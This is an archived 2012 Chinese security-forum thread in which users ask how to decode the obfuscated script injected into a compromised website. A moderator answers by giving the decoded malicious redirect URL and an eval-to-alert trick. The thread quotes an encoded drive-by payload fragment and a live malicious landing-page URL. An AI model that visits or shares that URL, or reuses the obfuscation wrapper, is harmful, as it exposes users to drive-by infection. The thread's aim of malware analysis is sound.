瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 已知被挂马 不会解密
布吉岛的故事 - 2012-12-11 21:25:00
地址  :hxxp://nikolamireasa.com/less/demands-probably.php


求版主给个解密的过程学习下  多谢

用户系统信息:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11
networkedition - 2012-12-12 12:44:00
解密结果:http://nikolamireasa.com/less/demands-probably.php?df=1n:1m:1g:1j:1m&ke=1m:1m:30:2v:2w:1l:31:2v:1k:2w&m=1k&cp=q&ub=o
布吉岛的故事 - 2012-12-12 13:49:00


引用:
原帖由 networkedition 于 2012-12-12 12:44:00 发表
解密结果:http://nikolamireasa.com/less/demands-probably.php?df=1n:1m:1g:1j:1m&ke=1m:1m:30:2v:2w:1l:31:2v:1k:2w&m=1k&cp=q&ub=o




  我其实就是想问问过程。。。
那些 代码 是都没有意义么  类似下面的这种

7d99!9h919l!aaa83h!8m469l!9j6e9j!a891a4!ac8g9f!77aa91!a4ai42!8m4699!9ja891!a4ac8g!9f6k91!9j95a8!973jb3!b342a2!aa91a4!ai5l9f!9f5la0!a09f91!a8a657!93aa9j!8ka899!9l9j3h!3jamac!8ga431!955da8!9799a6!42935d!954639!42915d!954639!39428m!5d9146!8ga0a0!9f91a8!428i42!


networkedition - 2012-12-12 13:53:00
过程就是:if(window.document){e=eval("eval");
if(document.getElementsByTagName("div")[0].style.left==="")e(c);}
        </script></body></html>
最后那个e(c);改成alert(c)
i_kaka_md - 2012-12-13 16:56:00
学习
redbsd - 2012-12-18 17:28:00
大版主,以下代码是什么编码?你怎么解出来的??

7d99!9h919l!aaa83h!8m469l!9j6e9j!a891a4!ac8g9f!77aa91!a4ai42!8m4699!9ja891!a4ac8g!9f6k91!9j95a8!973jb3!b342a2!aa91a4!ai5l9f!9f5la0!a09f91!a8a657!93aa9j!8ka899!9l9j3h!3jamac!8ga431!955da8!9799a6!42935d!954639!42915d!954639!39428m!5d9146!8ga0a0!9f91a8!428i42!
1
查看完整版本: 已知被挂马 不会解密